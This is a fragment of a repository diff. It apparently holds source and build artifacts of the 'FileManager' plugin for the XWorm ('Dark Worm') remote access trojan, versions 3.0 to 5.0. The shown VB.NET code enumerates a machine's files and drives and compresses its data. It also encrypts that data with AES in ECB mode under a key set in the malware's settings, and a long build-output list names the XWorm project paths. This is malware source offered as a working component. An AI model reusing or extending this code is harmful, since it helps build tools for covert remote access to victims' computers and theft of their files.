files &= f.Name & "-=>" & f.Length.ToString & "-=>" & lastWriteTime.ToString & "-=>"
|
||||
Next
|
||||
Return files
|
||||
End Function
|
||||
Public Function GetDrives() As String
|
||||
Dim allDrives As String = ""
|
||||
For Each d As DriveInfo In My.Computer.FileSystem.Drives
|
||||
If d.IsReady Then
|
||||
Select Case d.DriveType
|
||||
Case 3
|
||||
allDrives &= "[Drive]" & d.Name & "-=>-=>-=>"
|
||||
Case 5
|
||||
allDrives &= "[CD]" & d.Name & "-=>-=>-=>"
|
||||
Case 2
|
||||
allDrives &= "[USB]" & d.Name & "-=>-=>-=>"
|
||||
Case 4
|
||||
allDrives &= "[NET]" & d.Name & "-=>-=>-=>"
|
||||
End Select
|
||||
End If
|
||||
Next
|
||||
Return allDrives
|
||||
End Function
|
||||
|
||||
Function Decompress(ByVal input As Byte()) As Byte()
|
||||
Using source = New MemoryStream(input)
|
||||
Dim lengthBytes As Byte() = New Byte(3) {}
|
||||
source.Read(lengthBytes, 0, 4)
|
||||
Dim length = BitConverter.ToInt32(lengthBytes, 0)
|
||||
|
||||
Using decompressionStream = New GZipStream(source, CompressionMode.Decompress)
|
||||
Dim result = New Byte(length - 1) {}
|
||||
decompressionStream.Read(result, 0, length)
|
||||
Return result
|
||||
End Using
|
||||
End Using
|
||||
End Function
|
||||
Function Compress(ByVal input As Byte()) As Byte()
|
||||
Using result = New MemoryStream()
|
||||
Dim lengthBytes = BitConverter.GetBytes(input.Length)
|
||||
result.Write(lengthBytes, 0, 4)
|
||||
|
||||
Using compressionStream = New GZipStream(result, CompressionMode.Compress)
|
||||
compressionStream.Write(input, 0, input.Length)
|
||||
compressionStream.Flush()
|
||||
End Using
|
||||
|
||||
Return result.ToArray()
|
||||
End Using
|
||||
End Function
|
||||
|
||||
Function SB(ByVal s As String) As Byte()
|
||||
Return System.Text.Encoding.UTF8.GetBytes(s)
|
||||
End Function
|
||||
|
||||
Function BS(ByVal b As Byte()) As String
|
||||
Return System.Text.Encoding.UTF8.GetString(b)
|
||||
End Function
|
||||
|
||||
Function AES_Encryptor(ByVal input As Byte()) As Byte()
|
||||
Dim AES_ As New RijndaelManaged
|
||||
Dim Hash As New MD5CryptoServiceProvider
|
||||
Try
|
||||
AES_.Key = Hash.ComputeHash(SB(Settings.KEY))
|
||||
AES_.Mode = CipherMode.ECB
|
||||
Dim DESEncrypter As ICryptoTransform = AES_.CreateEncryptor
|
||||
Dim Buffer As Byte() = input
|
||||
Return DESEncrypter.TransformFinalBlock(Buffer, 0, Buffer.Length)
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
End Function
|
||||
|
||||
Function AES_Decryptor(ByVal input As Byte()) As Byte()
|
||||
Dim AES_ As New RijndaelManaged
|
||||
Dim Hash As New MD5CryptoServiceProvider
|
||||
Try
|
||||
AES_.Key = Hash.ComputeHash(SB(Settings.KEY))
|
||||
AES_.Mode = CipherMode.ECB
|
||||
Dim DESDecrypter As ICryptoTransform = AES_.CreateDecryptor
|
||||
Dim Buffer As Byte() = input
|
||||
Return DESDecrypter.TransformFinalBlock(Buffer, 0, Buffer.Length)
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
End Function
|
||||
End Module
|
||||
Binary file not shown.
+7
@@ -0,0 +1,7 @@
|
||||
' <autogenerated/>
|
||||
Option Strict Off
|
||||
Option Explicit On
|
||||
|
||||
Imports System
|
||||
Imports System.Reflection
|
||||
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName:=".NET Framework 4")>
|
||||
+7
@@ -0,0 +1,7 @@
|
||||
' <autogenerated/>
|
||||
Option Strict Off
|
||||
Option Explicit On
|
||||
|
||||
Imports System
|
||||
Imports System.Reflection
|
||||
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName:=".NET Framework 4.8")>
|
||||
BIN
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,3 @@
|
||||
FileManager.dll
|
||||
Microsoft.WindowsAPICodePack.dll
|
||||
Microsoft.WindowsAPICodePack.Shell.dll
|
||||
Binary file not shown.
@@ -0,0 +1 @@
|
||||
450ca20da2a26c351c70269e965e648346658dd5080d1749f129db9b674abe27
|
||||
@@ -0,0 +1,239 @@
|
||||
c:\users\laptop\documents\visual studio 2015\Projects\FileManager\FileManager\bin\Debug\FileManager.dll
|
||||
c:\users\laptop\documents\visual studio 2015\Projects\FileManager\FileManager\bin\Debug\FileManager.pdb
|
||||
c:\users\laptop\documents\visual studio 2015\Projects\FileManager\FileManager\bin\Debug\FileManager.xml
|
||||
c:\users\laptop\documents\visual studio 2015\Projects\FileManager\FileManager\obj\Debug\FileManager.Resources.resources
|
||||
c:\users\laptop\documents\visual studio 2015\Projects\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.Cache
|
||||
c:\users\laptop\documents\visual studio 2015\Projects\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
c:\users\laptop\documents\visual studio 2015\Projects\FileManager\FileManager\obj\Debug\FileManager.xml
|
||||
c:\users\laptop\documents\visual studio 2015\Projects\FileManager\FileManager\obj\Debug\FileManager.pdb
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\FileManager.dll
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.Resources.resources
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\FileManager.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\FileManager.dll
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.Resources.resources
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\LapTop\Desktop\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\PC\Desktop\New folder\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\FileManager.dll
|
||||
C:\Users\PC\Desktop\New folder\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\PC\Desktop\New folder\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.Resources.resources
|
||||
C:\Users\PC\Desktop\New folder\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\New folder\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\New folder\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\FileManager.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\FileManager.dll
|
||||
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\FileManager.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Dark Worm\bin\Debug\Plugins\FileManager.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Dark Worm\bin\Debug\Plugins\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Dark Worm\bin\Debug\Plugins\FileManager.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Dark Worm\bin\Debug\Plugins\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.pdb
|
||||
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.pdb
|
||||
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.pdb
|
||||
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.pdb
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.pdb
|
||||
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.pdb
|
||||
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.pdb
|
||||
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
